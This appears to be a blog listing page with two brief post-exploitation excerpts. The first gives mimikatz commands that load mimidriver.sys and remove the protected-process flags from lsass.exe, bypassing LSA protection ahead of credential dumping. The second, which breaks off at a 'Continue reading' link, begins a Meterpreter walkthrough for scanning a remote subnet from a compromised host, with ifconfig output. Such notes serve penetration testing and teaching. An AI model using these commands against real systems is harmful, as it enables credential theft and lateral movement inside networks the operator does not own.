LSA Protection Bypass Check if LSA runs as a protected process. The variable for "RunAsPPL" will be set to 0x1 in HKLM\SYSTEM\CurrentControlSet\Control\Lsa. Upload mimidriver.sys from the mimikatz repo to the same folder as mimikatz.exe, then import. mimikatz # !+ Remove the protection flags from the lsass.exe process. mimikatz # !processprotect /process:lsass.exe /remove

Meterpreter Remote Port Scan

Performing remote network scan via meterpreter session. Check IP configuration of compromised host: meterpreter > ifconfig Interface 2 ============ Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC : 00:50:56:87:a6:9c MTU : 1500 IPv4 Address : IPv4 Netmask : ARP scan of remote subnet. Using -r to set … Continue reading Meterpreter Remote Port Scan